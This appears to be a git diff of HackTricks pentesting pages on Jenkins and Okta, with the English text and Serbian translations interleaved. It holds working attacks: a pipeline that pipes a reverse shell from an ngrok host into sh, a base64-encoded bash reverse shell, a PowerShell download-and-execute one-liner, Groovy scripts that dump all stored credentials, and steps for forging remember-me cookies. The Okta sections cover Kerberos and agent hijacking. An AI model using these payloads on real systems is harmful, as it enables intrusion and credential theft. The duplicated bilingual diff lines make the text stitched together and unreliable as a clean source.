Definitions from the [docs](https://www.jenkins.io/doc/book/managing/nodes/):
Definicije iz [dokumentacije](https://www.jenkins.io/doc/book/managing/nodes/):
**Nodes** are the **machines** on which build **agents run**. Jenkins monitors each attached node for disk space, free temp space, free swap, clock time/sync and response time. A node is taken offline if any of these values go outside the configured threshold.
**Čvorovi** su **mašine** na kojima se izvršavaju **agenti za izgradnju**. Jenkins prati svaki priključeni čvor za slobodan prostor na disku, slobodan temp prostor, slobodan swap, vreme/sinkronizaciju sata i vreme odgovora. Čvor se uzima offline ako bilo koja od ovih vrednosti pređe konfigurisani prag.
**Agents** **manage** the **task execution** on behalf of the Jenkins controller by **using executors**. An agent can use any operating system that supports Java. Tools required for builds and tests are installed on the node where the agent runs; they can **be installed directly or in a container** (Docker or Kubernetes). Each **agent is effectively a process with its own PID** on the host machine.
**Agenti** **upravljaju** **izvršenjem zadataka** u ime Jenkins kontrolera koristeći **izvršioce**. Agent može koristiti bilo koji operativni sistem koji podržava Javu. Alati potrebni za izgradnje i testove su instalirani na čvoru gde agent radi; mogu se **instalirati direktno ili u kontejneru** (Docker ili Kubernetes). Svaki **agent je zapravo proces sa svojim PID** na host mašini.
An **executor** is a **slot for execution of tasks**; effectively, it is **a thread in the agent**. The **number of executors** on a node defines the number of **concurrent tasks** that can be executed on that node at one time. In other words, this determines the **number of concurrent Pipeline `stages`** that can execute on that node at one time.
**Izvršilac** je **slot za izvršenje zadataka**; zapravo, to je **nit u agentu**. **Broj izvršilaca** na čvoru definiše broj **paralelnih zadataka** koji se mogu izvršiti na tom čvoru u jednom trenutku. Drugim rečima, ovo određuje **broj paralelnih Pipeline `stages`** koji mogu izvršiti na tom čvoru u jednom trenutku.
## Jenkins Secrets
## Jenkins Tajne
### Encryption of Secrets and Credentials
### Enkripcija Tajni i Akreditiva
Definition from the [docs](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials): Jenkins uses **AES to encrypt and protect secrets**, credentials, and their respective encryption keys. These encryption keys are stored in `$JENKINS_HOME/secrets/` along with the master key used to protect said keys. This directory should be configured so that only the operating system user the Jenkins controller is running as has read and write access to this directory (i.e., a `chmod` value of `0700` or using appropriate file attributes). The **master key** (sometimes referred to as a "key encryption key" in cryptojargon) is **stored \_unencrypted**\_ on the Jenkins controller filesystem in **`$JENKINS_HOME/secrets/master.key`** which does not protect against attackers with direct access to that file. Most users and developers will use these encryption keys indirectly via either the [Secret](https://javadoc.jenkins.io/byShortName/Secret) API for encrypting generic secret data or through the credentials API. For the cryptocurious, Jenkins uses AES in cipher block chaining (CBC) mode with PKCS#5 padding and random IVs to encrypt instances of [CryptoConfidentialKey](https://javadoc.jenkins.io/byShortName/CryptoConfidentialKey) which are stored in `$JENKINS_HOME/secrets/` with a filename corresponding to their `CryptoConfidentialKey` id. Common key ids include:
Definicija iz [dokumentacije](https://www.jenkins.io/doc/developer/security/secrets/#encryption-of-secrets-and-credentials): Jenkins koristi **AES za enkripciju i zaštitu tajni**, akreditiva i njihovih odgovarajućih ključeva za enkripciju. Ovi ključevi za enkripciju se čuvaju u `$JENKINS_HOME/secrets/` zajedno sa glavnim ključem koji se koristi za zaštitu navedenih ključeva. Ovaj direktorijum treba konfigurisati tako da samo korisnik operativnog sistema pod kojim Jenkins kontroler radi ima pristup za čitanje i pisanje u ovaj direktorijum (tj. `chmod` vrednost `0700` ili korišćenjem odgovarajućih atributa datoteka). **Glavni ključ** (ponekad nazvan "ključ za enkripciju ključeva" u kriptožargonu) je **pohranjen \_nekriptovan\_** na datotečnom sistemu Jenkins kontrolera u **`$JENKINS_HOME/secrets/master.key`** što ne štiti od napadača sa direktnim pristupom toj datoteci. Većina korisnika i programera će koristiti ove ključeve za enkripciju indirektno putem [Secret](https://javadoc.jenkins.io/byShortName/Secret) API za enkripciju generičkih tajnih podataka ili putem API za akreditive. Za kriptozainteresovane, Jenkins koristi AES u režimu blokovne enkripcije (CBC) sa PKCS#5 punjenjem i nasumičnim IV-ima za enkripciju instanci [CryptoConfidentialKey](https://javadoc.jenkins.io/byShortName/CryptoConfidentialKey) koje se čuvaju u `$JENKINS_HOME/secrets/` sa imenom datoteke koje odgovara njihovom `CryptoConfidentialKey` id. Uobičajeni id ključeva uključuju:
- `hudson.util.Secret`: used for generic secrets;
- `com.cloudbees.plugins.credentials.SecretBytes.KEY`: used for some credentials types;
- `jenkins.model.Jenkins.crumbSalt`: used by the [CSRF protection mechanism](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery); and
- `hudson.util.Secret`: korišćen za generičke tajne;
- `com.cloudbees.plugins.credentials.SecretBytes.KEY`: korišćen za neke tipove akreditiva;
- `jenkins.model.Jenkins.crumbSalt`: korišćen od strane [CSRF zaštitnog mehanizma](https://www.jenkins.io/doc/book/managing/security/#cross-site-request-forgery); i
### Credentials Access
### Pristup Akreditivima
Credentials can be **scoped to global providers** (`/credentials/`) that can be accessed by any project configured, or can be scoped to **specific projects** (`/job/<project-name>/configure`) and therefore only accessible from the specific project.
Akreditivi mogu biti **ograničeni na globalne provajdere** (`/credentials/`) kojima može pristupiti bilo koji konfigurisani projekat, ili mogu biti ograničeni na **specifične projekte** (`/job/<project-name>/configure`) i stoga dostupni samo iz specifičnog projekta.
According to [**the docs**](https://www.jenkins.io/blog/2019/02/21/credentials-masking/): Credentials that are in scope are made available to the pipeline without limitation. To **prevent accidental exposure in the build log**, credentials are **masked** from regular output, so an invocation of `env` (Linux) or `set` (Windows), or programs printing their environment or parameters would **not reveal them in the build log** to users who would not otherwise have access to the credentials.
Prema [**dokumentaciji**](https://www.jenkins.io/blog/2019/02/21/credentials-masking/): Akreditivi koji su u opsegu su dostupni za pipeline bez ograničenja. Da bi se **sprečilo slučajno izlaganje u logu izgradnje**, akreditivi su **maskirani** iz redovnog izlaza, tako da poziv `env` (Linux) ili `set` (Windows), ili programi koji štampaju svoje okruženje ili parametre ne bi **otkrili njih u logu izgradnje** korisnicima koji inače ne bi imali pristup akreditivima.
**That is why in order to exfiltrate the credentials an attacker needs to, for example, base64 them.**
**Zato napadač treba, na primer, da ih base64 kodira da bi ih eksfiltrirao.**
## References
## Reference
- [https://www.jenkins.io/doc/book/security/managing-security/](https://www.jenkins.io/doc/book/security/managing-security/)
- [https://www.jenkins.io/doc/book/managing/nodes/](https://www.jenkins.io/doc/book/managing/nodes/)
@@ -92,7 +92,3 @@ According to [**the docs**](https://www.jenkins.io/blog/2019/02/21/credentials-m
- [https://www.jenkins.io/doc/book/managing/nodes/](https://www.jenkins.io/doc/book/managing/nodes/)
{{#include ../../banners/hacktricks-training.md}}

98
src/pentesting-ci-cd/jenkins-security/jenkins-arbitrary-file-read-to-rce-via-remember-me.md
View File

@@ -2,15 +2,15 @@
{{#include ../../banners/hacktricks-training.md}}
In this blog post is possible to find a great way to transform a Local File Inclusion vulnerability in Jenkins into RCE: [https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/](https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/)
U ovom blog postu je moguće pronaći sjajan način da se transformiše ranjivost Local File Inclusion u Jenkins-u u RCE: [https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/](https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/)
This is an AI created summary of the part of the post were the creaft of an arbitrary cookie is abused to get RCE abusing a local file read until I have time to create a summary on my own:
Ovo je AI kreirani sažetak dela posta gde se zloupotrebljava kreacija proizvoljnog kolačića da bi se dobio RCE zloupotrebom lokalnog čitanja datoteka dok ne budem imao vremena da napravim svoj sažetak:
### Attack Prerequisites
- **Feature Requirement:** "Remember me" must be enabled (default setting).
- **Access Levels:** Attacker needs Overall/Read permissions.
- **Secret Access:** Ability to read both binary and textual content from key files.
- **Feature Requirement:** "Remember me" mora biti omogućeno (podrazumevani postavka).
- **Access Levels:** Napadač treba Overall/Read dozvole.
- **Secret Access:** Sposobnost čitanja binarnog i tekstualnog sadržaja iz ključnih datoteka.
### Detailed Exploitation Process
@@ -18,18 +18,18 @@ This is an AI created summary of the part of the post were the creaft of an arbi
**User Information Retrieval**
- Access user configuration and secrets from `$JENKINS_HOME/users/*.xml` for each user to gather:
- **Username**
- **User seed**
- **Timestamp**
- **Password hash**
- Pristupite korisničkoj konfiguraciji i tajnama iz `$JENKINS_HOME/users/*.xml` za svakog korisnika da prikupite:
- **Username**
- **User seed**
- **Timestamp**
- **Password hash**
**Secret Key Extraction**
- Extract cryptographic keys used for signing the cookie:
- **Secret Key:** `$JENKINS_HOME/secret.key`
- **Master Key:** `$JENKINS_HOME/secrets/master.key`
- **MAC Key File:** `$JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac`
- Izvucite kriptografske ključeve korišćene za potpisivanje kolačića:
- **Secret Key:** `$JENKINS_HOME/secret.key`
- **Master Key:** `$JENKINS_HOME/secrets/master.key`
- **MAC Key File:** `$JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac`
#### Step 2: Cookie Forging
@@ -37,73 +37,69 @@ This is an AI created summary of the part of the post were the creaft of an arbi
- **Calculate Token Expiry Time:**
```javascript
tokenExpiryTime = currentServerTimeInMillis() + 3600000 // Adds one hour to current time
```
```javascript
tokenExpiryTime = currentServerTimeInMillis() + 3600000 // Dodaje jedan sat trenutnom vremenu
```
- **Concatenate Data for Token:**
```javascript
token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey
```
```javascript
token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey
```
**MAC Key Decryption**
- **Decrypt MAC Key File:**
```javascript
key = toAes128Key(masterKey) // Convert master key to AES128 key format
decrypted = AES.decrypt(macFile, key) // Decrypt the .mac file
if not decrypted.hasSuffix("::::MAGIC::::")
return ERROR;
macKey = decrypted.withoutSuffix("::::MAGIC::::")
```
```javascript
key = toAes128Key(masterKey) // Pretvori master ključ u AES128 format
decrypted = AES.decrypt(macFile, key) // Dešifruj .mac datoteku
if not decrypted.hasSuffix("::::MAGIC::::")
return ERROR;
macKey = decrypted.withoutSuffix("::::MAGIC::::")
```
**Signature Computation**
- **Compute HMAC SHA256:**
```javascript
mac = HmacSHA256(token, macKey) // Compute HMAC using the token and MAC key
tokenSignature = bytesToHexString(mac) // Convert the MAC to a hexadecimal string
```
```javascript
mac = HmacSHA256(token, macKey) // Izračunaj HMAC koristeći token i MAC ključ
tokenSignature = bytesToHexString(mac) // Pretvori MAC u heksadecimalni string
```
**Cookie Encoding**
- **Generate Final Cookie:**
```javascript
cookie = base64.encode(
username + ":" + tokenExpiryTime + ":" + tokenSignature
) // Base64 encode the cookie data
```
```javascript
cookie = base64.encode(
username + ":" + tokenExpiryTime + ":" + tokenSignature
) // Base64 kodiraj podatke kolačića
```
#### Step 3: Code Execution
**Session Authentication**
- **Fetch CSRF and Session Tokens:**
- Make a request to `/crumbIssuer/api/json` to obtain `Jenkins-Crumb`.
- Capture `JSESSIONID` from the response, which will be used in conjunction with the remember-me cookie.
- Napravite zahtev ka `/crumbIssuer/api/json` da dobijete `Jenkins-Crumb`.
- Zabeležite `JSESSIONID` iz odgovora, koji će se koristiti zajedno sa kolačićem "remember-me".
**Command Execution Request**
- **Send a POST Request with Groovy Script:**
```bash
curl -X POST "$JENKINS_URL/scriptText" \
--cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \
--header "Jenkins-Crumb: $CRUMB" \
--header "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "script=$SCRIPT"
```
```bash
curl -X POST "$JENKINS_URL/scriptText" \
--cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \
--header "Jenkins-Crumb: $CRUMB" \
--header "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "script=$SCRIPT"
```
- Groovy script can be used to execute system-level commands or other operations within the Jenkins environment.
- Groovy skripta može se koristiti za izvršavanje komandi na sistemskom nivou ili drugih operacija unutar Jenkins okruženja.
The example curl command provided demonstrates how to make a request to Jenkins with the necessary headers and cookies to execute arbitrary code securely.
Primer curl komande prikazan pokazuje kako napraviti zahtev ka Jenkins-u sa potrebnim zaglavljima i kolačićima za sigurno izvršavanje proizvoljnog koda.
{{#include ../../banners/hacktricks-training.md}}

78
src/pentesting-ci-cd/jenkins-security/jenkins-dumping-secrets-from-groovy.md
View File

@@ -3,10 +3,9 @@
{{#include ../../banners/hacktricks-training.md}}
> [!WARNING]
> Note that these scripts will only list the secrets inside the `credentials.xml` file, but **build configuration files** might also have **more credentials**.
You can **dump all the secrets from the Groovy Script console** in `/script` running this code
> Imajte na umu da će ovi skripti samo prikazati tajne unutar `credentials.xml` datoteke, ali **datoteke za konfiguraciju gradnje** takođe mogu imati **više kredencijala**.
Možete **izvući sve tajne iz Groovy Script konzole** u `/script` pokretanjem ovog koda
```java
// From https://www.dennisotugo.com/how-to-view-all-jenkins-secrets-credentials/
import jenkins.model.*
@@ -42,52 +41,45 @@ showRow("something else", it.id, '', '', '')
return
```
#### or this one:
#### или овај:
```java
import java.nio.charset.StandardCharsets;
def creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials(
com.cloudbees.plugins.credentials.Credentials.class
com.cloudbees.plugins.credentials.Credentials.class
)
for (c in creds) {
println(c.id)
if (c.properties.description) {
println(" description: " + c.description)
}
if (c.properties.username) {
println(" username: " + c.username)
}
if (c.properties.password) {
println(" password: " + c.password)
}
if (c.properties.passphrase) {
println(" passphrase: " + c.passphrase)
}
if (c.properties.secret) {
println(" secret: " + c.secret)
}
if (c.properties.secretBytes) {
println(" secretBytes: ")
println("\n" + new String(c.secretBytes.getPlainData(), StandardCharsets.UTF_8))
println("")
}
if (c.properties.privateKeySource) {
println(" privateKey: " + c.getPrivateKey())
}
if (c.properties.apiToken) {
println(" apiToken: " + c.apiToken)
}
if (c.properties.token) {
println(" token: " + c.token)
}
println("")
println(c.id)
if (c.properties.description) {
println(" description: " + c.description)
}
if (c.properties.username) {
println(" username: " + c.username)
}
if (c.properties.password) {
println(" password: " + c.password)
}
if (c.properties.passphrase) {
println(" passphrase: " + c.passphrase)
}
if (c.properties.secret) {
println(" secret: " + c.secret)
}
if (c.properties.secretBytes) {
println(" secretBytes: ")
println("\n" + new String(c.secretBytes.getPlainData(), StandardCharsets.UTF_8))
println("")
}
if (c.properties.privateKeySource) {
println(" privateKey: " + c.getPrivateKey())
}
if (c.properties.apiToken) {
println(" apiToken: " + c.apiToken)
}
if (c.properties.token) {
println(" token: " + c.token)
}
println("")
}
```
{{#include ../../banners/hacktricks-training.md}}

38
src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-pipeline.md
View File

@@ -2,42 +2,36 @@
{{#include ../../banners/hacktricks-training.md}}
## Creating a new Pipeline
## Kreiranje novog Pipelines
In "New Item" (accessible in `/view/all/newJob`) select **Pipeline:**
U "New Item" (dostupno na `/view/all/newJob`) izaberite **Pipeline:**
![](<../../images/image (235).png>)
In the **Pipeline section** write the **reverse shell**:
U **Pipeline sekciji** napišite **reverse shell**:
![](<../../images/image (285).png>)
```groovy
pipeline {
agent any
agent any
stages {
stage('Hello') {
steps {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
'''
}
}
}
stages {
stage('Hello') {
steps {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
'''
}
}
}
}
```
Finally click on **Save**, and **Build Now** and the pipeline will be executed:
Na kraju kliknite na **Save**, i **Build Now** i pipeline će biti izvršen:
![](<../../images/image (228).png>)
## Modifying a Pipeline
## Modifikovanje Pipeline-a
If you can access the configuration file of some pipeline configured you could just **modify it appending your reverse shell** and then execute it or wait until it gets executed.
Ako možete pristupiti konfiguracionom fajlu nekog konfigurisanog pipeline-a, možete jednostavno **modifikovati ga dodajući svoj reverzni shell** i zatim ga izvršiti ili čekati da bude izvršen.
{{#include ../../banners/hacktricks-training.md}}

28
src/pentesting-ci-cd/jenkins-security/jenkins-rce-creating-modifying-project.md
View File

@@ -4,37 +4,33 @@
## Creating a Project
This method is very noisy because you have to create a hole new project (obviously this will only work if you user is allowed to create a new project).
Ova metoda je veoma bučna jer morate da kreirate potpuno novi projekat (očigledno, ovo će raditi samo ako korisniku nije dozvoljeno da kreira novi projekat).
1. **Create a new project** (Freestyle project) clicking "New Item" or in `/view/all/newJob`
2. Inside **Build** section set **Execute shell** and paste a powershell Empire launcher or a meterpreter powershell (can be obtained using _unicorn_). Start the payload with _PowerShell.exe_ instead using _powershell._
3. Click **Build now**
1. If **Build now** button doesn't appear, you can still go to **configure** --> **Build Triggers** --> `Build periodically` and set a cron of `* * * * *`
2. Instead of using cron, you can use the config "**Trigger builds remotely**" where you just need to set a the api token name to trigger the job. Then go to your user profile and **generate an API token** (call this API token as you called the api token to trigger the job). Finally, trigger the job with: **`curl <username>:<api_token>@<jenkins_url>/job/<job_name>/build?token=<api_token_name>`**
1. **Kreirajte novi projekat** (Freestyle project) klikom na "New Item" ili u `/view/all/newJob`
2. Unutar **Build** sekcije postavite **Execute shell** i nalepite powershell Empire launcher ili meterpreter powershell (može se dobiti korišćenjem _unicorn_). Pokrenite payload sa _PowerShell.exe_ umesto korišćenja _powershell._
3. Kliknite na **Build now**
1. Ako **Build now** dugme ne pojavljuje, još uvek možete otići na **configure** --> **Build Triggers** --> `Build periodically` i postaviti cron na `* * * * *`
2. Umesto korišćenja crona, možete koristiti konfiguraciju "**Trigger builds remotely**" gde samo treba da postavite ime api tokena za pokretanje posla. Zatim idite na svoj korisnički profil i **generišite API token** (nazovite ovaj API token kao što ste nazvali api token za pokretanje posla). Na kraju, pokrenite posao sa: **`curl <username>:<api_token>@<jenkins_url>/job/<job_name>/build?token=<api_token_name>`**
![](<../../images/image (165).png>)
## Modifying a Project
Go to the projects and check **if you can configure any** of them (look for the "Configure button"):
Idite na projekte i proverite **da li možete da konfigurišete bilo koji** od njih (potražite "Configure button"):
![](<../../images/image (265).png>)
If you **cannot** see any **configuration** **button** then you **cannot** **configure** it probably (but check all projects as you might be able to configure some of them and not others).
Ako **ne možete** da vidite nijedno **konfiguraciono** **dugme** onda **ne možete** **konfigurisati** verovatno (ali proverite sve projekte jer možda možete da konfigurišete neke od njih, a ne druge).
Or **try to access to the path** `/job/<proj-name>/configure` or `/me/my-views/view/all/job/<proj-name>/configure` \_\_ in each project (example: `/job/Project0/configure` or `/me/my-views/view/all/job/Project0/configure`).
Ili **pokušajte da pristupite putanji** `/job/<proj-name>/configure` ili `/me/my-views/view/all/job/<proj-name>/configure` \_\_ u svakom projektu (primer: `/job/Project0/configure` ili `/me/my-views/view/all/job/Project0/configure`).
## Execution
If you are allowed to configure the project you can **make it execute commands when a build is successful**:
Ako vam je dozvoljeno da konfigurišete projekat, možete **učiniti da izvršava komande kada je build uspešan**:
![](<../../images/image (98).png>)
Click on **Save** and **build** the project and your **command will be executed**.\
If you are not executing a reverse shell but a simple command you can **see the output of the command inside the output of the build**.
Kliknite na **Save** i **build** projekat i vaša **komanda će biti izvršena**.\
Ako ne izvršavate reverse shell već jednostavnu komandu, možete **videti izlaz komande unutar izlaza build-a**.
{{#include ../../banners/hacktricks-training.md}}

38
src/pentesting-ci-cd/jenkins-security/jenkins-rce-with-groovy-script.md
View File

@@ -4,24 +4,21 @@
## Jenkins RCE with Groovy Script
This is less noisy than creating a new project in Jenkins
1. Go to _path_jenkins/script_
2. Inside the text box introduce the script
Ovo je manje bučno od kreiranja novog projekta u Jenkinsu
1. Idite na _path_jenkins/script_
2. Unutar tekstualnog okvira unesite skriptu
```python
def process = "PowerShell.exe <WHATEVER>".execute()
println "Found text ${process.text}"
```
Možete izvršiti komandu koristeći: `cmd.exe /c dir`
You could execute a command using: `cmd.exe /c dir`
U **linuxu** možete uraditi: **`"ls /".execute().text`**
In **linux** you can do: **`"ls /".execute().text`**
If you need to use _quotes_ and _single quotes_ inside the text. You can use _"""PAYLOAD"""_ (triple double quotes) to execute the payload.
**Another useful groovy script** is (replace \[INSERT COMMAND]):
Ako treba da koristite _navodnike_ i _jednostruke navodnike_ unutar teksta. Možete koristiti _"""PAYLOAD"""_ (trostruki dvostruki navodnici) da izvršite payload.
**Još jedan koristan groovy skript** je (zamenite \[INSERT COMMAND]):
```python
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '[INSERT COMMAND]'.execute()
@@ -29,9 +26,7 @@ proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
```
### Reverse shell in linux
### Obrnuta ljuska u linuxu
```python
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
@@ -39,29 +34,20 @@ proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
```
### Обратна љуска у Виндовсу
### Reverse shell in windows
You can prepare a HTTP server with a PS reverse shell and use Jeking to download and execute it:
Можете припремити HTTP сервер са PS обрнутом љуском и користити Jeking да је преузмете и извршите:
```python
scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <BASE64>
```
### Script
You can automate this process with [**this script**](https://github.com/gquere/pwn_jenkins/blob/master/rce/jenkins_rce_admin_script.py).
You can use MSF to get a reverse shell:
Možete automatizovati ovaj proces sa [**ovim skriptom**](https://github.com/gquere/pwn_jenkins/blob/master/rce/jenkins_rce_admin_script.py).
Možete koristiti MSF da dobijete reverznu ljusku:
```
msf> use exploit/multi/http/jenkins_script_console
```
{{#include ../../banners/hacktricks-training.md}}

112
src/pentesting-ci-cd/okta-security/README.md
View File

@@ -2,117 +2,113 @@
{{#include ../../banners/hacktricks-training.md}}
## Basic Information
## Osnovne informacije
[Okta, Inc.](https://www.okta.com/) is recognized in the identity and access management sector for its cloud-based software solutions. These solutions are designed to streamline and secure user authentication across various modern applications. They cater not only to companies aiming to safeguard their sensitive data but also to developers interested in integrating identity controls into applications, web services, and devices.
[Okta, Inc.](https://www.okta.com/) je prepoznata u sektoru upravljanja identitetom i pristupom zbog svojih rešenja zasnovanih na oblaku. Ova rešenja su dizajnirana da pojednostave i osiguraju autentifikaciju korisnika kroz različite moderne aplikacije. Ona su namenjena ne samo kompanijama koje žele da zaštite svoje osetljive podatke, već i programerima koji su zainteresovani za integraciju kontrola identiteta u aplikacije, veb usluge i uređaje.
The flagship offering from Okta is the **Okta Identity Cloud**. This platform encompasses a suite of products, including but not limited to:
Glavna ponuda Okta je **Okta Identity Cloud**. Ova platforma obuhvata paket proizvoda, uključujući, ali ne ograničavajući se na:
- **Single Sign-On (SSO)**: Simplifies user access by allowing one set of login credentials across multiple applications.
- **Multi-Factor Authentication (MFA)**: Enhances security by requiring multiple forms of verification.
- **Lifecycle Management**: Automates user account creation, update, and deactivation processes.
- **Universal Directory**: Enables centralized management of users, groups, and devices.
- **API Access Management**: Secures and manages access to APIs.
- **Single Sign-On (SSO)**: Pojednostavljuje pristup korisnika omogućavajući jedan set prijavnih podataka za više aplikacija.
- **Multi-Factor Authentication (MFA)**: Povećava bezbednost zahtevajući više oblika verifikacije.
- **Lifecycle Management**: Automatizuje procese kreiranja, ažuriranja i deaktivacije korisničkih naloga.
- **Universal Directory**: Omogućava centralizovano upravljanje korisnicima, grupama i uređajima.
- **API Access Management**: Osigurava i upravlja pristupom API-ima.
These services collectively aim to fortify data protection and streamline user access, enhancing both security and convenience. The versatility of Okta's solutions makes them a popular choice across various industries, beneficial to large enterprises, small companies, and individual developers alike. As of the last update in September 2021, Okta is acknowledged as a prominent entity in the Identity and Access Management (IAM) arena.
Ove usluge zajednički imaju za cilj jačanje zaštite podataka i pojednostavljenje pristupa korisnicima, poboljšavajući i bezbednost i pogodnost. Svestranost Okta rešenja čini ih popularnim izborom u različitim industrijama, korisnim za velike kompanije, male firme i pojedinačne programere. Na poslednjem ažuriranju u septembru 2021. godine, Okta je priznata kao istaknuta entitet u oblasti upravljanja identitetom i pristupom (IAM).
> [!CAUTION]
> The main gola of Okta is to configure access to different users and groups to external applications. If you manage to **compromise administrator privileges in an Oktas** environment, you will highly probably able to **compromise all the other platforms the company is using**.
> Glavni cilj Okta je da konfiguriše pristup različitim korisnicima i grupama za spoljne aplikacije. Ako uspete da **kompromitujete administratorske privilegije u Okta** okruženju, verovatno ćete moći da **kompromitujete sve druge platforme koje kompanija koristi**.
> [!TIP]
> To perform a security review of an Okta environment you should ask for **administrator read-only access**.
> Da biste izvršili bezbednosni pregled Okta okruženja, trebali biste zatražiti **administratorski pristup samo za čitanje**.
### Summary
### Sažetak
There are **users** (which can be **stored in Okta,** logged from configured **Identity Providers** or authenticated via **Active Directory** or LDAP).\
These users can be inside **groups**.\
There are also **authenticators**: different options to authenticate like password, and several 2FA like WebAuthn, email, phone, okta verify (they could be enabled or disabled)...
Postoje **korisnici** (koji mogu biti **smešteni u Okta,** prijavljeni iz konfigurisanih **Identity Providers** ili autentifikovani putem **Active Directory** ili LDAP).\
Ovi korisnici mogu biti unutar **grupa**.\
Postoje i **autentifikatori**: različite opcije za autentifikaciju kao što su lozinka, i nekoliko 2FA kao što su WebAuthn, email, telefon, okta verify (mogu biti omogućeni ili onemogućeni)...
Then, there are **applications** synchronized with Okta. Each applications will have some **mapping with Okta** to share information (such as email addresses, first names...). Moreover, each application must be inside an **Authentication Policy**, which indicates the **needed authenticators** for a user to **access** the application.
Zatim, postoje **aplikacije** sinhronizovane sa Okta. Svaka aplikacija će imati neku **mapu sa Okta** za deljenje informacija (kao što su email adrese, imena...). Štaviše, svaka aplikacija mora biti unutar **Politike autentifikacije**, koja označava **potrebne autentifikatore** za korisnika da **pristupi** aplikaciji.
> [!CAUTION]
> The most powerful role is **Super Administrator**.
> Najmoćnija uloga je **Super Administrator**.
>
> If an attacker compromise Okta with Administrator access, all the **apps trusting Okta** will be highly probably **compromised**.
> Ako napadač kompromituje Okta sa administratorskim pristupom, sve **aplikacije koje veruju Okta** će verovatno biti **kompromitovane**.
## Attacks
## Napadi
### Locating Okta Portal
### Lociranje Okta Portala
Usually the portal of a company will be located in **companyname.okta.com**. If not, try simple **variations** of **companyname.** If you cannot find it, it's also possible that the organization has a **CNAME** record like **`okta.companyname.com`** pointing to the **Okta portal**.
Obično će portal kompanije biti lociran na **companyname.okta.com**. Ako nije, pokušajte jednostavne **varijacije** od **companyname.** Ako ne možete da ga pronađete, takođe je moguće da organizacija ima **CNAME** zapis kao **`okta.companyname.com`** koji upućuje na **Okta portal**.
### Login in Okta via Kerberos
### Prijava u Okta putem Kerberosa
If **`companyname.kerberos.okta.com`** is active, **Kerberos is used for Okta access**, typically bypassing **MFA** for **Windows** users. To find Kerberos-authenticated Okta users in AD, run **`getST.py`** with **appropriate parameters**. Upon obtaining an **AD user ticket**, **inject** it into a controlled host using tools like Rubeus or Mimikatz, ensuring **`clientname.kerberos.okta.com` is in the Internet Options "Intranet" zone**. Accessing a specific URL should return a JSON "OK" response, indicating Kerberos ticket acceptance, and granting access to the Okta dashboard.
Ako je **`companyname.kerberos.okta.com`** aktivan, **Kerberos se koristi za pristup Okta**, obično zaobilazeći **MFA** za **Windows** korisnike. Da biste pronašli Kerberos-autentifikovane Okta korisnike u AD, pokrenite **`getST.py`** sa **odgovarajućim parametrima**. Nakon dobijanja **AD korisničkog tiketa**, **ubacite** ga u kontrolisani host koristeći alate kao što su Rubeus ili Mimikatz, osiguravajući da je **`clientname.kerberos.okta.com` u "Intranet" zoni Internet opcija**. Pristup određenom URL-u trebao bi da vrati JSON "OK" odgovor, što ukazuje na prihvatanje Kerberos tiketa, i omogućava pristup Okta kontrolnoj tabli.
Compromising the **Okta service account with the delegation SPN enables a Silver Ticket attack.** However, Okta's use of **AES** for ticket encryption requires possessing the AES key or plaintext password. Use **`ticketer.py` to generate a ticket for the victim user** and deliver it via the browser to authenticate with Okta.
Kompromitovanje **Okta servisnog naloga sa delegacijom SPN omogućava Silver Ticket napad.** Međutim, korišćenje **AES** za enkripciju tiketa zahteva posedovanje AES ključa ili lozinke u običnom tekstu. Koristite **`ticketer.py` da generišete tiket za korisnika žrtve** i isporučite ga putem pregledača da biste se autentifikovali sa Okta.
**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
**Proverite napad u** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.**
### Hijacking Okta AD Agent
### Otimanje Okta AD Agenta
This technique involves **accessing the Okta AD Agent on a server**, which **syncs users and handles authentication**. By examining and decrypting configurations in **`OktaAgentService.exe.config`**, notably the AgentToken using **DPAPI**, an attacker can potentially **intercept and manipulate authentication data**. This allows not only **monitoring** and **capturing user credentials** in plaintext during the Okta authentication process but also **responding to authentication attempts**, thereby enabling unauthorized access or providing universal authentication through Okta (akin to a 'skeleton key').
Ova tehnika uključuje **pristupanje Okta AD Agentu na serveru**, koji **sinhronizuje korisnike i upravlja autentifikacijom**. Istražujući i dekriptovanjem konfiguracija u **`OktaAgentService.exe.config`**, posebno AgentToken koristeći **DPAPI**, napadač može potencijalno **presresti i manipulisati podacima o autentifikaciji**. Ovo omogućava ne samo **praćenje** i **hvatanje korisničkih podataka** u običnom tekstu tokom Okta procesa autentifikacije, već i **odgovaranje na pokušaje autentifikacije**, čime se omogućava neovlašćen pristup ili pružanje univerzalne autentifikacije putem Okta (slično 'skeleton key').
